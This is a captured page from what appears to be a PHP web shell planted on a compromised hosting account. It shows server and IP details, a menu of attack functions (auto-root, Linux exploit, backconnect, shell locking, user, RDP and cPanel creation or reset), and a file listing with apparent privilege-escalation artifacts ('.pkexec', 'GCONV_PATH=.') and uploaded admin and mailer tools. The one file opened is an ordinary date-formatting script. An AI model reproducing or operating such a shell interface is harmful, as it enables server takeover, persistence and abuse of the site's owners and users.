Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
functions /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
banner_details.php
312
B
-rw-r--r--
delete_chat.php
430
B
-rw-r--r--
friendly_time.php
1
KB
-rw-r--r--
hastag.php
2.62
KB
-rw-r--r--
last_login.php
1006
B
-rw-r--r--
list_account_type.php
543
B
-rw-r--r--
list_banks.php
9.3
KB
-rw-r--r--
list_location.php
11.23
KB
-rw-r--r--
mailer.php
57.67
KB
-rw-r--r--
mobile_detect.php
597
B
-rw-r--r--
plans.php
7.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : friendly_time.php
<?php //actaul time $post_date = $time; $actual_date = date('y-m-d, h:ia'); $actual_time=explode(",", $actual_date); $actual_day=explode("-", $actual_time[0]); $actual_same_month = $actual_day[0]."-".$actual_day[1]; //post date $post_time=explode(",", $post_date); $post_day=explode("-", $post_time[0]); $post_same_month = $post_day[0]."-".$post_day[1]; if($post_date == $actual_date){ $newtime= "Just now"; } elseif($post_day == $actual_day){ $newtime= "Today at ".$post_time[1]; } else{ if($actual_day[2]>$post_day[2]){ $days = $actual_day[2]- $post_day[2]; } else{ $days = $post_day[2]- $actual_day[2]; } if($post_same_month==$actual_same_month && $days==1){ $newtime= "Yesterday at ".$post_time[1]; } elseif($post_same_month==$actual_same_month && $days<5){ $newtime= $days." days ago "; } else{ //$newtime = date('D, d/m/Y - h:ia', strtotime($time)); $newtime = date('jS F, Y', strtotime($time)).", ".$post_time[1]; } } ?>
Close